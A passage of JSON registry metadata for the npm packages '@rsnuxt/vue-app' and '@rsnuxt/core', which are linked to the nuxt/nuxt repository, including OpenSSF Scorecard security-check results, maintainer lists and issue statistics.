uninstall.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#packaging"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#binary-artifacts"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Info: jobLevel 'contents' permission set to 'read': .github/workflows/cache-cleanup.yml:18","Warn: jobLevel 'actions' permission set to 'write': .github/workflows/cache-cleanup.yml:17","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/changelog.yml:22","Info: jobLevel 'contents' permission set to 'read': .github/workflows/ci.yml:76","Info: jobLevel 'actions' permission set to 'read': .github/workflows/ci.yml:75","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/release.yml:20","Info: jobLevel 'contents' permission set to 'read': .github/workflows/scorecards.yml:29","Info: jobLevel 'actions' permission set to 'read': .github/workflows/scorecards.yml:30","Info: jobLevel 'contents' permission set to 'read': .github/workflows/semantic-pull-requests.yml:15","Info: jobLevel 'pull-requests' permission set to 'read': .github/workflows/semantic-pull-requests.yml:16","Warn: jobLevel 'statuses' permission set to 'write': .github/workflows/semantic-pull-requests.yml:17","Info: topLevel 'contents' permission set to 'read': .github/workflows/autofix-docs.yml:11","Info: topLevel 'contents' permission set to 'read': .github/workflows/autofix.yml:9","Info: found token with 'none' permissions: .github/workflows/cache-cleanup.yml:1","Info: found token with 'none' permissions: .github/workflows/changelog.yml:1","Info: found token with 'none' permissions: .github/workflows/ci.yml:1","Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:15","Info: found token with 'none' permissions: .github/workflows/docs-check-links.yml:1","Info: found token with 'none' permissions: .github/workflows/docs-deploy.yml:1","Info: found token with 'none' permissions: .github/workflows/docs.yml:1","Info: found token with 'none' permissions: .github/workflows/label-pr.yml:1","Info: topLevel 'contents' permission set to 'read': .github/workflows/lint-monorepo.yml:22","Info: topLevel 'contents' permission set to 'read': .github/workflows/lint-workflows.yml:20","Info: found token with 'none' permissions: .github/workflows/notify-nuxt-bridge.yml:1","Info: found token with 'none' permissions: .github/workflows/notify-nuxt-website.yml:1","Info: found token with 'none' permissions: .github/workflows/release.yml:1","Info: topLevel permissions set to 'read-all': .github/workflows/scorecards.yml:18","Info: found token with 'none' permissions: .github/workflows/semantic-pull-requests.yml:1","Info: found token with 'none' permissions: .github/workflows/team-triage.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#token-permissions"}},{"name":"Pinned-Dependencies","score":10,"reason":"all dependencies are pinned","details":["Info:  59 out of  59 GitHub-owned GitHubAction dependencies pinned","Info:  28 out of  28 third-party GitHubAction dependencies pinned","Info:   1 out of   1 containerImage dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#cii-best-practices"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#signed-releases"}},{"name":"SAST","score":9,"reason":"SAST tool detected but not run on all commits","details":["Info: SAST configuration detected: CodeQL","Warn: 22 commits out of 24 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#sast"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#fuzzing"}},{"name":"Branch-Protection","score":5,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'allow deletion' disabled on branch '3.x'","Info: 'force pushes' disabled on branch 'main'","Info: 'force pushes' disabled on branch '3.x'","Warn: 'branch protection settings apply to administrators' is disabled on branch 'main'","Warn: 'branch protection settings apply to administrators' is disabled on branch '3.x'","Warn: 'stale review dismissal' is disabled on branch 'main'","Warn: 'stale review dismissal' is disabled on branch '3.x'","Warn: required approving review count is 1 on branch 'main'","Warn: required approving review count is 1 on branch '3.x'","Info: codeowner review is required on branch 'main'","Info: codeowner review is required on branch '3.x'","Info: 'last push approval' is required to merge on branch 'main'","Info: 'last push approval' is required to merge on branch '3.x'","Warn: 'up-to-date branches' is disabled on branch 'main'","Warn: 'up-to-date branches' is disabled on branch '3.x'","Info: status check found to merge onto on branch 'main'","Info: status check found to merge onto on branch '3.x'","Info: PRs are required in order to make changes on branch 'main'","Info: PRs are required in order to make changes on branch '3.x'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#branch-protection"}},{"name":"CI-Tests","score":10,"reason":"24 out of 24 merged PRs checked by a CI test -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project runs tests before pull requests are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#ci-tests"}},{"name":"Contributors","score":10,"reason":"project has 77 contributing companies or organizations","details":["Info: found contributions from: D2Arsenal, DescendantGG, Developmint, GitHub-Stars, HelloAsso, HubSpot, JabRef, Lottomerkury, MetridashCore, Strawbei, Tresjs, WinterTC55, Zettlr, acquiredigital, albionstatus, alibaba-aero, antfu-collective, antfu-sponsors, benevolt, bootstrap-vue, codecember-ink, ecosystem-ci, elk-zone, esbuild-kit, eslint-stylistic, fse-employability, github-beta, gridsome, gubutler, h3js, helloasso, intlify, jabama-co, javascript-compiler-hints, knightlyjs, krutie patel, leetchi, lottomerkury sp. z o.o., mash-up, masters-info-nantes, mdit-vue, myself, nitrojs, nuxt, nuxt-community, nuxt-contrib, nuxt-modules, nuxtlabs, oxc-project, passionatepeople, shikijs, singularit-de, slidevjs, tastejs, tsperf, twoslashes, type-challenges, unjs, unjs . @nitrojs . @h3js . @nuxt, unocss, unplugin, vercel, vite-pwa, vitejs, vitest-dev, voidzero-dev, vue-reactivity, vue-terminal, vuejs, vuejs @vitejs @vueuse, vuejs-jp, vuetifyjs, vueuse, we-dance, webfansplz-sponsors, wenyan-lang, windicss"],"documentation":{"short":"Determines if the project has a set of contributors from multiple organizations (e.g., companies).","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#contributors"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-52f5-9888-hmc6"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-17T01:26:04.118Z","repository_id":37288797,"created_at":"2025-08-17T01:26:04.118Z","updated_at":"2025-08-17T01:26:04.118Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":32304464,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-04-26T09:34:17.070Z","status":"ssl_error","status_checked_at":"2026-04-26T09:34:00.993Z","response_time":129,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"tags":[]},"repo_metadata_updated_at":"2026-05-11T01:23:04.009Z","dependent_packages_count":0,"downloads":724,"downloads_period":"last-month","dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":25.063441759567027,"dependent_packages_count":36.25204172285812,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":30.657741741212572},"purl":"pkg:npm/%40rsnuxt/vue-app","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/@rsnuxt/vue-app","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/@rsnuxt/vue-app","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/@rsnuxt/vue-app/dependencies","status":null,"funding_links":["https://opencollective.com/nuxtjs"],"critical":null,"issue_metadata":{"last_synced_at":"2026-02-13T18:00:30.319Z","issues_count":6007,"pull_requests_count":6866,"avg_time_to_close_issue":11690528.2843204,"avg_time_to_close_pull_request":786776.4495867769,"issues_closed_count":4402,"pull_requests_closed_count":6050,"pull_request_authors_count":588,"issue_authors_count":3402,"avg_comments_per_issue":4.151489928416847,"avg_comments_per_pull_request":2.496213224584911,"merged_pull_requests_count":5386,"bot_issues_count":12,"bot_pull_requests_count":2972,"past_year_issues_count":940,"past_year_pull_requests_count":1678,"past_year_avg_time_to_close_issue":711939.6998050682,"past_year_avg_time_to_close_pull_request":221172.79485238457,"past_year_issues_closed_count":513,"past_year_pull_requests_closed_count":1321,"past_year_pull_request_authors_count":141,"past_year_issue_authors_count":674,"past_year_avg_comments_per_issue":2.2457446808510637,"past_year_avg_comments_per_pull_request":3.4153754469606676,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":694,"past_year_merged_pull_requests_count":1175,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/issues","maintainers":[{"login":"danielroe","count":1324,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":364,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"DamianGlowala","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"pi0","count":98,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pi0"},{"login":"Mini-ghost","count":91,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mini-ghost"},{"login":"manniL","count":76,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/manniL"},{"login":"BobbieGoede","count":70,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"antfu","count":63,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"userquin","count":50,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"cernymatej","count":44,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/cernymatej"},{"login":"TheAlexLichter","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheAlexLichter"},{"login":"OrbisK","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/OrbisK"},{"login":"wattanx","count":25,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"Atinux","count":24,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Atinux"},{"login":"ineshbose","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"atinux","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"productdevbook","count":16,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"dargmuesli","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"},{"login":"Hebilicious","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"},{"login":"warflash","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/warflash"},{"login":"lihbr","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lihbr"},{"login":"madebyfabian","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/madebyfabian"},{"login":"KazariEX","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/KazariEX"},{"login":"HugoRCD","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/HugoRCD"},{"login":"romhml","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/romhml"},{"login":"posva","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/posva"},{"login":"clarkdo","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/clarkdo"},{"login":"farnabaz","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/farnabaz"},{"login":"arashsheyda","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arashsheyda"},{"login":"Diizzayy","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Diizzayy"},{"login":"adhamfarrag","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/adhamfarrag"},{"login":"vargasmesh","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vargasmesh"},{"login":"benjamincanac","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/benjamincanac"},{"login":"kikudesuyo","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kikudesuyo"},{"login":"kazupon","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kazupon"},{"login":"msmakouz","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/msmakouz"}],"active_maintainers":[{"login":"danielroe","count":321,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":72,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"Mini-ghost","count":66,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mini-ghost"},{"login":"OrbisK","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/OrbisK"},{"login":"BobbieGoede","count":29,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"cernymatej","count":29,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/cernymatej"},{"login":"DamianGlowala","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"TheAlexLichter","count":21,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheAlexLichter"},{"login":"atinux","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"wattanx","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"userquin","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"antfu","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"KazariEX","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/KazariEX"},{"login":"HugoRCD","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/HugoRCD"},{"login":"productdevbook","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"romhml","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/romhml"},{"login":"dargmuesli","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"},{"login":"kikudesuyo","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kikudesuyo"},{"login":"ineshbose","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"Hebilicious","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@rsnuxt%2Fvue-app/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@rsnuxt%2Fvue-app/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@rsnuxt%2Fvue-app/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@rsnuxt%2Fvue-app/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@rsnuxt%2Fvue-app/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@rsnuxt%2Fvue-app/codemeta","maintainers":[{"uuid":"vincent.bian","login":"vincent.bian","name":null,"email":"macisi528@gmail.com","url":null,"packages_count":74,"html_url":"https://www.npmjs.com/~vincent.bian","role":null,"created_at":"2025-02-11T09:42:16.438Z","updated_at":"2025-02-11T09:42:16.438Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/vincent.bian/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5608775,"maintainers_count":1189233,"namespaces_count":373614,"keywords_count":0,"github":"npm","metadata":{"funded_packages_count":166557},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-04-03T05:46:01.652Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":11343190,"name":"@rsnuxt/core","ecosystem":"npm","description":null,"homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/nuxt/nuxt","keywords_array":[],"namespace":"rsnuxt","versions_count":21,"first_release_published_at":"2025-02-11T09:14:59.301Z","latest_release_published_at":"2025-10-11T04:55:27.848Z","latest_release_number":"0.5.11","last_synced_at":"2026-05-11T01:23:04.691Z","created_at":"2025-02-11T09:37:02.283Z","updated_at":"2026-05-11T01:23:04.691Z","registry_url":"https://www.npmjs.com/package/@rsnuxt/core","install_command":"npm install @rsnuxt/core","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"0.2.2-alpha.1":"0.2.2-alpha.1","latest":"0.5.11"}},"repo_metadata":{"id":37288797,"uuid":"71995937","full_name":"nuxt/nuxt","owner":"nuxt","description":"The Full-Stack Vue Framework.","archived":false,"fork":false,"pushed_at":"2026-04-24T15:11:02.000Z","size":136837,"stargazers_count":60120,"open_issues_count":949,"forks_count":5591,"subscribers_count":777,"default_branch":"main","last_synced_at":"2026-04-24T20:04:41.708Z","etag":null,"topics":["csr","framework","full-stack","hacktoberfest","hybrid","node","nuxt","server-rendering","ssg","ssr","static-site-generator","universal","vue"],"latest_commit_sha":null,"homepage":"https://nuxt.com","language":"TypeScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/nuxt.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":"CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":"CODEOWNERS","security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"open_collective":"nuxtjs"}},"created_at":"2016-10-26T11:18:47.000Z","updated_at":"2026-04-24T18:27:37.000Z","dependencies_parsed_at":"2026-03-18T13:06:30.670Z","dependency_job_id":null,"html_url":"https://github.com/nuxt/nuxt","commit_stats":{"total_commits":7074,"total_committers":809,"mean_commits":8.744128553770086,"dds":0.6857506361323156,"last_synced_commit":"660f1720301b8d6487c89b6f86b4e7630573bca4"},"previous_names":["nuxt/nuxt.js","atinux/nuxt.js"],"tags_count":317,"template":false,"template_full_name":null,"purl":"pkg:github/nuxt/nuxt","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/sbom","scorecard":{"id":214668,"data":{"date":"2025-08-15T10:56:51Z","repo":{"name":"github.com/nuxt/nuxt","commit":"abf5d9e9f4a78a393a0ffbd8cfac8d24731217d6"},"scorecard":{"version":"v5.2.1","commit":"ab2f6e92482462fe66246d9e32f642855a691dc1"},"score":8.4,"checks":[{"name":"Dependency-Update-Tool","score":10,"reason":"update tool detected","details":["Info: detected update tool: RenovateBot: renovate.json:1"],"documentation":{"short":"Determines if the project uses a dependency update tool.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dependency-update-tool"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 16 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#maintained"}},{"name":"Code-Review","score":6,"reason":"Found 14/23 approved changesets -- score normalized to 6","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#code-review"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dangerous-workflow"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#security-policy"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#packaging"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#binary-artifacts"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Info: jobLevel 'contents' permission set to 'read': .github/workflows/cache-cleanup.yml:18","Warn: jobLevel 'actions' permission set to 'write': .github/workflows/cache-cleanup.yml:17","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/changelog.yml:22","Info: jobLevel 'contents' permission set to 'read': .github/workflows/ci.yml:76","Info: jobLevel 'actions' permission set to 'read': .github/workflows/ci.yml:75","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/release.yml:20","Info: jobLevel 'contents' permission set to 'read': .github/workflows/scorecards.yml:29","Info: jobLevel 'actions' permission set to 'read': .github/workflows/scorecards.yml:30","Info: jobLevel 'contents' permission set to 'read': .github/workflows/semantic-pull-requests.yml:15","Info: jobLevel 'pull-requests' permission set to 'read': .github/workflows/semantic-pull-requests.yml:16","Warn: jobLevel 'statuses' permission set to 'write': .github/workflows/semantic-pull-requests.yml:17","Info: topLevel 'contents' permission set to 'read': .github/workflows/autofix-docs.yml:11","Info: topLevel 'contents' permission set to 'read': .github/workflows/autofix.yml:9","Info: found token with 'none' permissions: .github/workflows/cache-cleanup.yml:1","Info: found token with 'none' permissions: .github/workflows/changelog.yml:1","Info: found token with 'none' permissions: .github/workflows/ci.yml:1","Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:15","Info: found token with 'none' permissions: .github/workflows/docs-check-links.yml:1","Info: found token with 'none' permissions: .github/workflows/docs-deploy.yml:1","Info: found token with 'none' permissions: .github/workflows/docs.yml:1","Info: found token with 'none' permissions: .github/workflows/label-pr.yml:1","Info: topLevel 'contents' permission set to 'read': .github/workflows/lint-monorepo.yml:22","Info: topLevel 'contents' permission set to 'read': .github/workflows/lint-workflows.yml:20","Info: found token with 'none' permissions: .github/workflows/notify-nuxt-bridge.yml:1","Info: found token with 'none' permissions: .github/workflows/notify-nuxt-website.yml:1","Info: found token with 'none' permissions: .github/workflows/release.yml:1","Info: topLevel permissions set to 'read-all': .github/workflows/scorecards.yml:18","Info: found token with 'none' permissions: .github/workflows/semantic-pull-requests.yml:1","Info: found token with 'none' permissions: .github/workflows/team-triage.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#token-permissions"}},{"name":"Pinned-Dependencies","score":10,"reason":"all dependencies are pinned","details":["Info:  59 out of  59 GitHub-owned GitHubAction dependencies pinned","Info:  28 out of  28 third-party GitHubAction dependencies pinned","Info:   1 out of   1 containerImage dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#cii-best-practices"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#signed-releases"}},{"name":"SAST","score":9,"reason":"SAST tool detected but not run on all commits","details":["Info: SAST configuration detected: CodeQL","Warn: 22 commits out of 24 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#sast"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#fuzzing"}},{"name":"Branch-Protection","score":5,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'allow deletion' disabled on branch '3.x'","Info: 'force pushes' disabled on branch 'main'","Info: 'force pushes' disabled on branch '3.x'","Warn: 'branch protection settings apply to administrators' is disabled on branch 'main'","Warn: 'branch protection settings apply to administrators' is disabled on branch '3.x'","Warn: 'stale review dismissal' is disabled on branch 'main'","Warn: 'stale review dismissal' is disabled on branch '3.x'","Warn: required approving review count is 1 on branch 'main'","Warn: required approving review count is 1 on branch '3.x'","Info: codeowner review is required on branch 'main'","Info: codeowner review is required on branch '3.x'","Info: 'last push approval' is required to merge on branch 'main'","Info: 'last push approval' is required to merge on branch '3.x'","Warn: 'up-to-date branches' is disabled on branch 'main'","Warn: 'up-to-date branches' is disabled on branch '3.x'","Info: status check found to merge onto on branch 'main'","Info: status check found to merge onto on branch '3.x'","Info: PRs are required in order to make changes on branch 'main'","Info: PRs are required in order to make changes on branch '3.x'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection 